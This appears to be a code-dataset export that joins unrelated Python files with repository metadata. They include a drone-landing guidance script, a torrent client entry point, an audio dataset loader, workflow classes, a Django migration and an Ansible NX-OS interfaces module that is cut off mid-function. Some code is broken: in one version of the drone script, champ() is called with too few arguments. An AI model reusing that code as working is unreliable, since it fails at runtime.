        db_dir = os.path.dirname(self.db_file)
        if db_dir and not os.path.exists(db_dir):
            os.makedirs(db_dir)
        return sqlite3.connect(self.db_file)

    def _initialize_table(self):
        # ``self.table`` is a class constant, so %-formatting the SQL is safe.
        self.conn.execute('''
            create table if not exists %s (
                id text not null unique
            )
        ''' % self.table)
        return self
| 983 | 309 | 23 |
5b71d011d822f95ce25f55c2574551dc96b232fe | 1,860 | py | Python | examples/guidage.py | MaxLgy/Autoland | ca94eef0d2f3dafa56cc271751d72db91d704098 | [
"MIT"
] | null | null | null | examples/guidage.py | MaxLgy/Autoland | ca94eef0d2f3dafa56cc271751d72db91d704098 | [
"MIT"
] | null | null | null | examples/guidage.py | MaxLgy/Autoland | ca94eef0d2f3dafa56cc271751d72db91d704098 | [
"MIT"
] | 1 | 2021-05-16T15:20:19.000Z | 2021-05-16T15:20:19.000Z | from numpy import cross, array , vdot
from numpy.linalg import norm
import matplotlib.pyplot as plt
from roblib import *
def vct_nrm(a,b,c):
"""Soit a,b,c trois coin de la plateforme supossée carrée, n est un vecteur normal de cette platforme"""
V1 = a-b
V2 = a-c
n = cross(V1,V2).T
return n/norm(n)
def champ(p,n,phat,v_d):
"""p position du drone, n vecteur normal à la plateforme, phat point cible où attérir, v_d vecteur vitesse de la plateforme"""
calc1 = cross(n.T,(p-phat).T)
pt_attract = 1*(phat-p)
vitesse_cible = 0.5*v_d
Q = 0.4*cross(n.T,calc1)+pt_attract.T + vitesse_cible
return Q
a = array([[0,5,0]])
b = array([[1,0,0]])
c = array([[0,1,0]])
n = vct_nrm(a,b,c)
print("vecteur normal = ",n)
phat = array([[100],[0],[0]]) #position point d'attérissage
p = array([[0],[0],[100]]) #position drone
Q = champ(p,n,phat)
print("n.Q",vdot(n, Q))
print("valeur du champ au point",Q)
a = a.flatten()
b = b.flatten()
c = c.flatten()
fig = figure()
ax = Axes3D(fig)
# for x in arange(0,1,0.1):
# for y in arange(0,1,0.1):
# for z in arange(0,3,0.25):
# draw_shampoing(array([[x,y,z]]).T)
# phat = phat.flatten()
# ax.scatter(phat[0],phat[1],phat[2]) #phat
# n = n.flatten()
# ax.plot([phat[0],phat[0]+3*n[0]],[phat[1],phat[1]+3*n[1]],[phat[2],phat[2]+3*n[2]]) #vecteur normal à partir de phat
# ax.plot([a[0],b[0],c[0],a[0]],[a[1],b[1],c[1],a[1]],[a[2],b[2],c[2],a[2]]) #platforme
# pause(10)
"""
plt.figure()
plt.xlim((-3,3))
plt.ylim((-3,3))
plt.plot(phat[0,0],phat[1,0],'ob')
plt.plot(p[0,0],p[1,0],'or')
plt.plot([p.flatten()[0],p.flatten()[0]+Q.flatten()[0]],[p.flatten()[1],p.flatten()[1]+Q.flatten()[1]])
plt.show()"""
| 26.956522 | 127 | 0.604301 | from numpy import cross, array , vdot
from numpy.linalg import norm
import matplotlib.pyplot as plt
from roblib import *
def vct_nrm(a,b,c):
    """Unit normal of the (assumed square) platform through corners a, b, c.

    a, b and c are (1, 3) row vectors; the result is the normalised
    cross product (a-b) x (a-c), transposed to a (3, 1) column vector.
    """
    edge1 = a - b
    edge2 = a - c
    normal = cross(edge1, edge2).T
    return normal / norm(normal)
def champ(p, n, phat, v_d=0):
    """Guidance vector field evaluated at the drone position.

    p    -- drone position, (3, 1) column vector
    n    -- unit normal of the landing platform, (3, 1) column vector
    phat -- target landing point, (3, 1) column vector
    v_d  -- platform velocity feed-forward term; defaults to 0 (stationary
            platform).  The default also fixes the three-argument call
            sites in this module (``champ(p,n,phat)``), which previously
            raised TypeError.
    Returns a (1, 3) row vector combining a swirl term around the platform
    normal, an attraction toward phat and the velocity feed-forward.
    """
    swirl_axis = cross(n.T, (p - phat).T)
    attraction = 1 * (phat - p)
    feed_forward = 0.5 * v_d
    return 0.4 * cross(n.T, swirl_axis) + attraction.T + feed_forward
def draw_shampoing(p):
    """Draw the guidance-field vector at point ``p`` on the global 3-D axes.

    Relies on the module-level globals ``ax``, ``n`` and ``phat``.
    NOTE(review): calls ``champ`` with three arguments while it is defined
    with four (``v_d``) -- confirm the intended platform velocity.
    """
    #ax.scatter(p[0],p[1],p[2]) #p
    Q = champ(p,n,phat)
    Q = Q.flatten()
    p = p.flatten()
    ax.plot([p[0],p[0]+Q[0]],[p[1],p[1]+Q[1]],[p[2],p[2]+Q[2]],'g-') # field vector at p
# Demo / sanity check: build a platform from three corners and evaluate
# the guidance field at a sample drone position.
a = array([[0,5,0]])
b = array([[1,0,0]])
c = array([[0,1,0]])
n = vct_nrm(a,b,c)
print("vecteur normal = ",n)
phat = array([[100],[0],[0]]) # landing target position
p = array([[0],[0],[100]]) # drone position
# NOTE(review): champ() is defined with four parameters (p, n, phat, v_d);
# this three-argument call raises TypeError as written -- confirm v_d.
Q = champ(p,n,phat)
print("n.Q",vdot(n, Q))
print("valeur du champ au point",Q)
a = a.flatten()
b = b.flatten()
c = c.flatten()
fig = figure()
ax = Axes3D(fig)
# for x in arange(0,1,0.1):
# for y in arange(0,1,0.1):
# for z in arange(0,3,0.25):
# draw_shampoing(array([[x,y,z]]).T)
# phat = phat.flatten()
# ax.scatter(phat[0],phat[1],phat[2]) #phat
# n = n.flatten()
# ax.plot([phat[0],phat[0]+3*n[0]],[phat[1],phat[1]+3*n[1]],[phat[2],phat[2]+3*n[2]]) #vecteur normal à partir de phat
# ax.plot([a[0],b[0],c[0],a[0]],[a[1],b[1],c[1],a[1]],[a[2],b[2],c[2],a[2]]) #platforme
# pause(10)
"""
plt.figure()
plt.xlim((-3,3))
plt.ylim((-3,3))
plt.plot(phat[0,0],phat[1,0],'ob')
plt.plot(p[0,0],p[1,0],'or')
plt.plot([p.flatten()[0],p.flatten()[0]+Q.flatten()[0]],[p.flatten()[1],p.flatten()[1]+Q.flatten()[1]])
plt.show()"""
| 174 | 0 | 23 |
cd321a02147ac54d46cd08610302a2d2864aa096 | 493 | py | Python | GammaTorrent/main.py | Devam911/Gamma-Torrent | 42079c497f8ebdc7aa1a442f3e34770747217e5c | [
"MIT"
] | 1 | 2020-12-06T10:38:32.000Z | 2020-12-06T10:38:32.000Z | GammaTorrent/main.py | Devam911/Gamma-Torrent | 42079c497f8ebdc7aa1a442f3e34770747217e5c | [
"MIT"
] | null | null | null | GammaTorrent/main.py | Devam911/Gamma-Torrent | 42079c497f8ebdc7aa1a442f3e34770747217e5c | [
"MIT"
] | 2 | 2020-12-06T10:55:48.000Z | 2020-12-15T14:28:00.000Z | __author__ = ["Manav Vagrecha", "Shreyansh Shah", "Devam Shah"]
__email__ = ["manavkumar.v@ahduni.edu.in", "shreyansh.s1@ahduni.edu.in", "devam.s1@ahduni.edu.in"]
import logging
import sys
import main_manager
if __name__ == '__main__':
# configuring the log outputs to the debug level
logging.basicConfig(level=logging.DEBUG)
torrent_name = str(sys.argv[1])
# runs the constructor and gets the file content
mngr = main_manager.MainManager(torrent_name)
mngr.start() | 30.8125 | 98 | 0.726166 | __author__ = ["Manav Vagrecha", "Shreyansh Shah", "Devam Shah"]
__email__ = ["manavkumar.v@ahduni.edu.in", "shreyansh.s1@ahduni.edu.in", "devam.s1@ahduni.edu.in"]
import logging
import sys
import main_manager
if __name__ == '__main__':
# configuring the log outputs to the debug level
logging.basicConfig(level=logging.DEBUG)
torrent_name = str(sys.argv[1])
# runs the constructor and gets the file content
mngr = main_manager.MainManager(torrent_name)
mngr.start() | 0 | 0 | 0 |
c6734bf49760adf1241cdaa9c9fafc9ab5fe77b0 | 2,700 | py | Python | azrt2021/data_from_csv.py | vkola-lab/azrt2021 | a75c1302434c4578daf4cde119cfa50f552a9a43 | [
"MIT"
] | 2 | 2021-02-17T15:51:00.000Z | 2022-01-05T06:07:07.000Z | azrt2021/data_from_csv.py | vkola-lab/azrt2021 | a75c1302434c4578daf4cde119cfa50f552a9a43 | [
"MIT"
] | 1 | 2022-03-12T01:06:03.000Z | 2022-03-12T01:06:03.000Z | azrt2021/data_from_csv.py | vkola-lab/azrt2021 | a75c1302434c4578daf4cde119cfa50f552a9a43 | [
"MIT"
] | 1 | 2021-11-09T00:43:18.000Z | 2021-11-09T00:43:18.000Z | """
data_from_csv.py
audio dataset reading from CSV output file;
"""
from torch.utils.data import Dataset
import numpy as np
import pandas as pd
class AudioDatasetFromCsv(Dataset):
    """dVoice audio dataset backed by a CSV manifest.

    Each CSV row must provide at least ``audio_fn`` (path to a saved numpy
    feature array), ``label`` and ``patient_id``; optional ``start``/``end``
    columns delimit a segment of the feature array.
    """
    def __init__(self, csv_in, **kwargs):
        """
        Load the CSV manifest and store segmentation options.

        :param csv_in: path to the manifest CSV.
        :param kwargs: optional keys ``do_segment_audio`` (bool),
            ``segment_audio`` (callable returning ``(features, (start, end))``)
            and ``segment_audio_kw`` (dict of extra kwargs for that callable).
        """
        self.csv_in = csv_in
        self.df_dat = pd.read_csv(csv_in)
        self.do_segment_audio = kwargs.get('do_segment_audio', False)
        self.segment_audio = kwargs.get('segment_audio')
        self.segment_audio_kw = kwargs.get('segment_audio_kw', {})
    def __len__(self):
        """
        Number of rows in the manifest.
        """
        return len(self.df_dat)
    def __getitem__(self, idx):
        """
        Return ``(features, label, patient_id, start, end)`` for row ``idx``.
        """
        if self.do_segment_audio:
            # Delegate loading + segmentation to the user-supplied callable.
            fea, start_end = self.segment_audio(self.df_dat.loc[idx,'audio_fn'],
                                                **self.segment_audio_kw)
            start, end = start_end
        else:
            # 'in' on a pandas Series tests the index, i.e. column presence.
            start = self.df_dat.loc[idx, 'start'] if 'start' in self.df_dat.loc[idx] else None
            end = self.df_dat.loc[idx, 'end'] if 'end' in self.df_dat.loc[idx] else None
            fea = np.load(self.df_dat.loc[idx, 'audio_fn'])
        try:
            # Slice only when both bounds are present and not NaN
            # (missing CSV cells load as NaN).
            # NOTE(review): when do_segment_audio is set, fea may already be
            # segmented and is sliced again here -- verify against the
            # segment_audio callable's contract.
            if (start is not None and end is not None) and\
                (not np.isnan(start) and not np.isnan(end)):
                start = int(start)
                end = int(end)
                fea = fea[start:end]
        except TypeError as error:
            # Dump the offending bound values before re-raising to aid debugging.
            print(start)
            print(end)
            print(type(start))
            print(type(end))
            raise error
        return fea, self.df_dat.loc[idx, 'label'], self.df_dat.loc[idx, 'patient_id'], start, end
    @property
    def labels(self):
        """
        convert label column to np array;
        """
        return self.df_dat.label.to_numpy()
    @property
    def df_sampling_weights(self):
        """
        convert label to numpy() and add 1 to each;
        """
        return self.df_dat.label.to_numpy() + 1
    @property
    def audio_fns(self):
        """
        convert audio filename columns to np array;
        """
        return self.df_dat['audio_fn'].to_numpy()
    @property
    def transcript_fns(self):
        """
        convert transcript filename columns to np array;
        """
        return self.df_dat['transcript_fn'].to_numpy()
def segment_collate_fn(batch):
    """Collate a batch of ``(features, label, patient_id, start, end)`` tuples.

    Feature arrays may differ in length, so they stay a plain Python list;
    the scalar fields are stacked into numpy arrays.

    :param batch: iterable of 5-tuples as produced by
        ``AudioDatasetFromCsv.__getitem__``.
    :return: tuple ``(aud, lbl, pid, start, end)``.
    """
    aud = [itm[0] for itm in batch]
    lbl = np.stack([itm[1] for itm in batch])
    pid = np.stack([itm[2] for itm in batch])
    # Bug fix: the original passed a bare generator to np.stack, which is
    # deprecated and raises a TypeError on modern numpy; use a list like
    # the other fields.
    start = np.stack([itm[3] for itm in batch])
    end = np.stack([itm[4] for itm in batch])
    return aud, lbl, pid, start, end
| 29.347826 | 97 | 0.564815 | """
data_from_csv.py
audio dataset reading from CSV output file;
"""
from torch.utils.data import Dataset
import numpy as np
import pandas as pd
class AudioDatasetFromCsv(Dataset):
"""dVoice dataset."""
def __init__(self, csv_in, **kwargs):
"""
init
"""
self.csv_in = csv_in
self.df_dat = pd.read_csv(csv_in)
self.do_segment_audio = kwargs.get('do_segment_audio', False)
self.segment_audio = kwargs.get('segment_audio')
self.segment_audio_kw = kwargs.get('segment_audio_kw', {})
def __len__(self):
"""
length
"""
return len(self.df_dat)
def __getitem__(self, idx):
"""
get item
"""
if self.do_segment_audio:
fea, start_end = self.segment_audio(self.df_dat.loc[idx,'audio_fn'],
**self.segment_audio_kw)
start, end = start_end
else:
start = self.df_dat.loc[idx, 'start'] if 'start' in self.df_dat.loc[idx] else None
end = self.df_dat.loc[idx, 'end'] if 'end' in self.df_dat.loc[idx] else None
fea = np.load(self.df_dat.loc[idx, 'audio_fn'])
try:
if (start is not None and end is not None) and\
(not np.isnan(start) and not np.isnan(end)):
start = int(start)
end = int(end)
fea = fea[start:end]
except TypeError as error:
print(start)
print(end)
print(type(start))
print(type(end))
raise error
return fea, self.df_dat.loc[idx, 'label'], self.df_dat.loc[idx, 'patient_id'], start, end
@property
def labels(self):
"""
convert label column to np array;
"""
return self.df_dat.label.to_numpy()
@property
def df_sampling_weights(self):
"""
convert label to numpy() and add 1 to each;
"""
return self.df_dat.label.to_numpy() + 1
@property
def audio_fns(self):
"""
convert audio filename columns to np array;
"""
return self.df_dat['audio_fn'].to_numpy()
@property
def transcript_fns(self):
"""
convert transcript filename columns to np array;
"""
return self.df_dat['transcript_fn'].to_numpy()
def segment_collate_fn(batch):
"""
collect audio path, label, patient ID, start, end
"""
aud = [itm[0] for itm in batch]
lbl = np.stack([itm[1] for itm in batch])
pid = np.stack([itm[2] for itm in batch])
start = np.stack(itm[3] for itm in batch)
end = np.stack([itm[4] for itm in batch])
return aud, lbl, pid, start, end
| 0 | 0 | 0 |
4106d9cfc8b30f0a8cc972336e9629c09863a3a7 | 1,826 | py | Python | rflow/common.py | otaviog/rflow | 8594b9c3e9e1da61382f80b66e749cf7b8a33676 | [
"MIT"
] | 6 | 2019-08-26T11:36:58.000Z | 2020-12-15T21:01:24.000Z | rflow/common.py | otaviog/rflow | 8594b9c3e9e1da61382f80b66e749cf7b8a33676 | [
"MIT"
] | null | null | null | rflow/common.py | otaviog/rflow | 8594b9c3e9e1da61382f80b66e749cf7b8a33676 | [
"MIT"
] | 1 | 2020-04-13T08:05:27.000Z | 2020-04-13T08:05:27.000Z | """
Common definitions of the workflow module.
"""
WORKFLOW_DEFAULT_FILENAME = 'workflow.py'
DOT_DATABASE_FILENAME = '.workflow.lmdb'
class Uninit(object):
    """Sentinel type marking framework-context values not yet initialized.

    Python's ``None`` cannot serve this role, since ``None`` may be a
    perfectly valid value supplied by the user.
    """
class WorkflowError(Exception):
    """Base exception for all workflow module errors.

    Args:
        message (str): Error message
        lineinfo (:obj:`._reflection.LineInfo`, optional): Source line
            information. Pointer to errors in user's code.
    """

    def __init__(self, message, lineinfo=None):
        # Fix: the docstring documents a `lineinfo` argument, but without a
        # constructor the class ignored it (it became a bare Exception arg).
        # When line information is available, prefix the message with a
        # traceback-style location so users can find the offending code.
        if lineinfo is not None:
            message = '"{}", line {}, in {}\n {}'.format(
                lineinfo.filepath, lineinfo.line, lineinfo.function,
                message)
        super(WorkflowError, self).__init__(message)
class BaseNode:
    """Base methods for nodes. Should be used to create new node types.

    Attributes:
        show (bool): Whether the node is shown on the command line
            help.
    """

    def __init__(self):
        # Fix: the docstring documents `show`, but nothing ever set it, so
        # reading node.show raised AttributeError. Nodes are listed in the
        # command-line help by default; subclasses may opt out.
        self.show = True

    def call(self, redo=False):
        """
        Executes the node main logic and returns its value.
        """
        raise NotImplementedError()

    def update(self):
        """
        Should update the dirty state of function :func:`is_dirty`.
        """
        pass

    def is_dirty(self):
        """Returns if the node should be call or it's already update.
        """
        raise NotImplementedError()

    def get_resource(self):
        """Returns the attched node's resource"""
        raise NotImplementedError()

    def get_view_name(self):
        """Returns how the node should be labeled to the user. Default is returning its name.

        Subclasses are expected to define a ``name`` attribute.
        """
        return self.name
| 23.714286 | 96 | 0.615005 | """
Common definitions of the workflow module.
"""
WORKFLOW_DEFAULT_FILENAME = 'workflow.py'
DOT_DATABASE_FILENAME = '.workflow.lmdb'
class Uninit(object):
"""Sentinel for unitialized values on the framework context. Python's
`None` can't be used, because `None` can be a valid for the user.
"""
pass
class WorkflowError(Exception):
"""Base exception for all workflow module errors.
Args:
message (str): Error message
lineinfo (:obj:`._reflection.LineInfo`, optional): Source line
information. Pointer to errors in user's code.
"""
def __init__(self, message, lineinfo=None):
if lineinfo is not None:
message = '"{}", line {}, in {}\n {}'.format(
lineinfo.filepath, lineinfo.line, lineinfo.function,
message)
super(WorkflowError, self).__init__(message)
class BaseNode:
"""Base methods for nodes. Should be used to create new node types.
Attributes:
show (bool): Whatever the node is show on the command line
help.
"""
def __init__(self):
self.show = True
def call(self, redo=False):
"""
Executes the node main logic and returns its value.
"""
raise NotImplementedError()
def update(self):
"""
Should update the dirty state of function :func:`is_dirty`.
"""
pass
def is_dirty(self):
"""Returns if the node should be call or it's already update.
"""
raise NotImplementedError()
def get_resource(self):
"""Returns the attched node's resource"""
raise NotImplementedError()
def get_view_name(self):
"""Returns how the node should be labeled to the user. Default is returning its name."""
return self.name
| 283 | 0 | 54 |
fc8c4080b50b28b1fb6ddd4a6aa9afb8009d26ed | 518 | py | Python | feedback_survey/migrations/0014_auto_20170510_1717.py | mushahid54/feedback_survey | a568008f0717b52649010286e55e242f083734be | [
"MIT"
] | null | null | null | feedback_survey/migrations/0014_auto_20170510_1717.py | mushahid54/feedback_survey | a568008f0717b52649010286e55e242f083734be | [
"MIT"
] | null | null | null | feedback_survey/migrations/0014_auto_20170510_1717.py | mushahid54/feedback_survey | a568008f0717b52649010286e55e242f083734be | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-05-10 17:17
from __future__ import unicode_literals
from django.db import migrations, models
| 24.666667 | 112 | 0.61583 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-05-10 17:17
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('feedback_survey', '0013_feedback_state'),
]
operations = [
migrations.AlterField(
model_name='feedback',
name='state',
field=models.CharField(choices=[(b'1', b'Pending'), (b'2', b'Completed')], default=1, max_length=3),
),
]
| 0 | 339 | 23 |
f3df173c07598e604dee27e3ee7b95046ae4022c | 11,132 | py | Python | ansible/venv/lib/python2.7/site-packages/ansible/module_utils/network/nxos/config/l3_interfaces/l3_interfaces.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 0fb18850afe0d8609693ba4b23f29c7cda17d97f | [
"MIT"
] | 17 | 2017-06-07T23:15:01.000Z | 2021-08-30T14:32:36.000Z | ansible/venv/lib/python2.7/site-packages/ansible/module_utils/network/nxos/config/l3_interfaces/l3_interfaces.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 0fb18850afe0d8609693ba4b23f29c7cda17d97f | [
"MIT"
] | 9 | 2017-06-25T03:31:52.000Z | 2021-05-17T23:43:12.000Z | ansible/venv/lib/python2.7/site-packages/ansible/module_utils/network/nxos/config/l3_interfaces/l3_interfaces.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 0fb18850afe0d8609693ba4b23f29c7cda17d97f | [
"MIT"
] | 3 | 2018-05-26T21:31:22.000Z | 2019-09-28T17:00:45.000Z | #
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""
The nxos_l3_interfaces class
It is in this file where the current configuration (as dict)
is compared to the provided configuration (as dict) and the command set
necessary to bring the current configuration to it's desired end-state is
created
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible.module_utils.network.common.cfg.base import ConfigBase
from ansible.module_utils.network.common.utils import to_list, remove_empties
from ansible.module_utils.network.nxos.facts.facts import Facts
from ansible.module_utils.network.nxos.utils.utils import normalize_interface, search_obj_in_list
from ansible.module_utils.network.nxos.utils.utils import remove_rsvd_interfaces, get_interface_type
class L3_interfaces(ConfigBase):
    """
    The nxos_l3_interfaces class

    Compares the device's current L3 interface configuration (facts) against
    the desired configuration and generates the CLI commands needed to reach
    the desired end-state.
    """
    # NOTE(review): this chunk references helpers such as set_commands,
    # del_delta_attribs and del_all_attribs that are not visible here --
    # presumably defined elsewhere in the full module; confirm before editing.
    gather_subset = [
        '!all',
        '!min',
    ]
    gather_network_resources = [
        'l3_interfaces',
    ]
    exclude_params = [
    ]
    def get_l3_interfaces_facts(self):
        """ Get the 'facts' (the current configuration)

        :rtype: A dictionary
        :returns: The current configuration as a dictionary
        """
        facts, _warnings = Facts(self._module).get_facts(self.gather_subset, self.gather_network_resources)
        l3_interfaces_facts = facts['ansible_network_resources'].get('l3_interfaces')
        if not l3_interfaces_facts:
            return []
        # Reserved interfaces (e.g. management) are never managed here.
        return remove_rsvd_interfaces(l3_interfaces_facts)
    def execute_module(self):
        """ Execute the module

        :rtype: A dictionary
        :returns: The result from module execution
        """
        result = {'changed': False}
        commands = list()
        warnings = list()
        existing_l3_interfaces_facts = self.get_l3_interfaces_facts()
        commands.extend(self.set_config(existing_l3_interfaces_facts))
        if commands:
            # Only push commands to the device outside of check mode.
            if not self._module.check_mode:
                self.edit_config(commands)
            result['changed'] = True
        result['commands'] = commands
        changed_l3_interfaces_facts = self.get_l3_interfaces_facts()
        result['before'] = existing_l3_interfaces_facts
        if result['changed']:
            result['after'] = changed_l3_interfaces_facts
        result['warnings'] = warnings
        return result
    def set_config(self, existing_l3_interfaces_facts):
        """ Collect the configuration from the args passed to the module,
            collect the current configuration (as a dict from facts)

        :rtype: A list
        :returns: the commands necessary to migrate the current configuration
                  to the desired configuration
        """
        config = self._module.params.get('config')
        want = []
        if config:
            for w in config:
                # Expand short interface names (e.g. 'eth1/1' -> 'Ethernet1/1').
                w.update({'name': normalize_interface(w['name'])})
                if get_interface_type(w['name']) == 'management':
                    self._module.fail_json(msg="The 'management' interface is not allowed to be managed by this module")
                want.append(remove_empties(w))
        have = existing_l3_interfaces_facts
        resp = self.set_state(want, have)
        return to_list(resp)
    def set_state(self, want, have):
        """ Select the appropriate function based on the state provided

        :param want: the desired configuration as a dictionary
        :param have: the current configuration as a dictionary
        :rtype: A list
        :returns: the commands necessary to migrate the current configuration
                  to the desired configuration
        """
        state = self._module.params['state']
        if state in ('overridden', 'merged', 'replaced') and not want:
            self._module.fail_json(msg='config is required for state {0}'.format(state))
        commands = list()
        if state == 'overridden':
            commands.extend(self._state_overridden(want, have))
        elif state == 'deleted':
            commands.extend(self._state_deleted(want, have))
        else:
            # merged/replaced operate per-interface.
            for w in want:
                if state == 'merged':
                    commands.extend(self._state_merged(w, have))
                elif state == 'replaced':
                    commands.extend(self._state_replaced(w, have))
        return commands
    def _state_replaced(self, w, have):
        """ The command generator when state is replaced

        :rtype: A list
        :returns: the commands necessary to migrate the current configuration
                  to the desired configuration
        """
        commands = []
        merged_commands = self.set_commands(w, have)
        replaced_commands = self.del_delta_attribs(w, have)
        if merged_commands:
            # Drop delete commands that the merge set would immediately undo.
            cmds = set(replaced_commands).intersection(set(merged_commands))
            for cmd in cmds:
                merged_commands.remove(cmd)
            commands.extend(replaced_commands)
        commands.extend(merged_commands)
        return commands
    def _state_overridden(self, want, have):
        """ The command generator when state is overridden

        :rtype: A list
        :returns: the commands necessary to migrate the current configuration
                  to the desired configuration
        """
        commands = []
        # Wipe attributes from every existing interface not exactly matching
        # a wanted entry, then apply the wanted configuration.
        for h in have:
            obj_in_want = search_obj_in_list(h['name'], want, 'name')
            if h == obj_in_want:
                continue
            commands.extend(self.del_all_attribs(h))
        for w in want:
            commands.extend(self.set_commands(w, have))
        return commands
    def _state_merged(self, w, have):
        """ The command generator when state is merged

        :rtype: A list
        :returns: the commands necessary to merge the provided into
                  the current configuration
        """
        return self.set_commands(w, have)
    def _state_deleted(self, want, have):
        """ The command generator when state is deleted

        :rtype: A list
        :returns: the commands necessary to remove the current configuration
                  of the provided objects
        """
        commands = []
        if want:
            # Delete only the explicitly named interfaces.
            for w in want:
                obj_in_have = search_obj_in_list(w['name'], have, 'name')
                commands.extend(self.del_all_attribs(obj_in_have))
        else:
            # No want: delete L3 config from every interface we know about.
            if not have:
                return commands
            for h in have:
                commands.extend(self.del_all_attribs(h))
        return commands
| 35.565495 | 120 | 0.590729 | #
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""
The nxos_l3_interfaces class
It is in this file where the current configuration (as dict)
is compared to the provided configuration (as dict) and the command set
necessary to bring the current configuration to it's desired end-state is
created
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible.module_utils.network.common.cfg.base import ConfigBase
from ansible.module_utils.network.common.utils import to_list, remove_empties
from ansible.module_utils.network.nxos.facts.facts import Facts
from ansible.module_utils.network.nxos.utils.utils import normalize_interface, search_obj_in_list
from ansible.module_utils.network.nxos.utils.utils import remove_rsvd_interfaces, get_interface_type
class L3_interfaces(ConfigBase):
"""
The nxos_l3_interfaces class
"""
gather_subset = [
'!all',
'!min',
]
gather_network_resources = [
'l3_interfaces',
]
exclude_params = [
]
def __init__(self, module):
super(L3_interfaces, self).__init__(module)
def get_l3_interfaces_facts(self):
""" Get the 'facts' (the current configuration)
:rtype: A dictionary
:returns: The current configuration as a dictionary
"""
facts, _warnings = Facts(self._module).get_facts(self.gather_subset, self.gather_network_resources)
l3_interfaces_facts = facts['ansible_network_resources'].get('l3_interfaces')
if not l3_interfaces_facts:
return []
return remove_rsvd_interfaces(l3_interfaces_facts)
def edit_config(self, commands):
return self._connection.edit_config(commands)
def execute_module(self):
""" Execute the module
:rtype: A dictionary
:returns: The result from module execution
"""
result = {'changed': False}
commands = list()
warnings = list()
existing_l3_interfaces_facts = self.get_l3_interfaces_facts()
commands.extend(self.set_config(existing_l3_interfaces_facts))
if commands:
if not self._module.check_mode:
self.edit_config(commands)
result['changed'] = True
result['commands'] = commands
changed_l3_interfaces_facts = self.get_l3_interfaces_facts()
result['before'] = existing_l3_interfaces_facts
if result['changed']:
result['after'] = changed_l3_interfaces_facts
result['warnings'] = warnings
return result
def set_config(self, existing_l3_interfaces_facts):
""" Collect the configuration from the args passed to the module,
collect the current configuration (as a dict from facts)
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
config = self._module.params.get('config')
want = []
if config:
for w in config:
w.update({'name': normalize_interface(w['name'])})
if get_interface_type(w['name']) == 'management':
self._module.fail_json(msg="The 'management' interface is not allowed to be managed by this module")
want.append(remove_empties(w))
have = existing_l3_interfaces_facts
resp = self.set_state(want, have)
return to_list(resp)
def set_state(self, want, have):
""" Select the appropriate function based on the state provided
:param want: the desired configuration as a dictionary
:param have: the current configuration as a dictionary
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
state = self._module.params['state']
if state in ('overridden', 'merged', 'replaced') and not want:
self._module.fail_json(msg='config is required for state {0}'.format(state))
commands = list()
if state == 'overridden':
commands.extend(self._state_overridden(want, have))
elif state == 'deleted':
commands.extend(self._state_deleted(want, have))
else:
for w in want:
if state == 'merged':
commands.extend(self._state_merged(w, have))
elif state == 'replaced':
commands.extend(self._state_replaced(w, have))
return commands
def _state_replaced(self, w, have):
""" The command generator when state is replaced
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
commands = []
merged_commands = self.set_commands(w, have)
replaced_commands = self.del_delta_attribs(w, have)
if merged_commands:
cmds = set(replaced_commands).intersection(set(merged_commands))
for cmd in cmds:
merged_commands.remove(cmd)
commands.extend(replaced_commands)
commands.extend(merged_commands)
return commands
def _state_overridden(self, want, have):
""" The command generator when state is overridden
:rtype: A list
:returns: the commands necessary to migrate the current configuration
to the desired configuration
"""
commands = []
for h in have:
obj_in_want = search_obj_in_list(h['name'], want, 'name')
if h == obj_in_want:
continue
commands.extend(self.del_all_attribs(h))
for w in want:
commands.extend(self.set_commands(w, have))
return commands
def _state_merged(self, w, have):
""" The command generator when state is merged
:rtype: A list
:returns: the commands necessary to merge the provided into
the current configuration
"""
return self.set_commands(w, have)
def _state_deleted(self, want, have):
""" The command generator when state is deleted
:rtype: A list
:returns: the commands necessary to remove the current configuration
of the provided objects
"""
commands = []
if want:
for w in want:
obj_in_have = search_obj_in_list(w['name'], have, 'name')
commands.extend(self.del_all_attribs(obj_in_have))
else:
if not have:
return commands
for h in have:
commands.extend(self.del_all_attribs(h))
return commands
def del_all_attribs(self, obj):
commands = []
if not obj or len(obj.keys()) == 1:
return commands
commands = self.generate_delete_commands(obj)
if commands:
commands.insert(0, 'interface ' + obj['name'])
return commands
def del_delta_attribs(self, w, have):
commands = []
obj_in_have = search_obj_in_list(w['name'], have, 'name')
if obj_in_have:
lst_to_del = []
ipv4_intersect = self.intersect_list_of_dicts(w.get('ipv4'), obj_in_have.get('ipv4'))
ipv6_intersect = self.intersect_list_of_dicts(w.get('ipv6'), obj_in_have.get('ipv6'))
if ipv4_intersect:
lst_to_del.append({'ipv4': ipv4_intersect})
if ipv6_intersect:
lst_to_del.append({'ipv6': ipv6_intersect})
if lst_to_del:
for item in lst_to_del:
commands.extend(self.generate_delete_commands(item))
else:
commands.extend(self.generate_delete_commands(obj_in_have))
if commands:
commands.insert(0, 'interface ' + obj_in_have['name'])
return commands
def generate_delete_commands(self, obj):
commands = []
if 'ipv4' in obj:
commands.append('no ip address')
if 'ipv6' in obj:
commands.append('no ipv6 address')
return commands
def diff_of_dicts(self, w, obj):
diff = set(w.items()) - set(obj.items())
diff = dict(diff)
if diff and w['name'] == obj['name']:
diff.update({'name': w['name']})
return diff
def diff_list_of_dicts(self, w, h):
diff = []
set_w = set(tuple(sorted(d.items())) for d in w) if w else set()
set_h = set(tuple(sorted(d.items())) for d in h) if h else set()
difference = set_w.difference(set_h)
for element in difference:
diff.append(dict((x, y) for x, y in element))
return diff
def intersect_list_of_dicts(self, w, h):
intersect = []
waddr = []
haddr = []
set_w = set()
set_h = set()
if w:
for d in w:
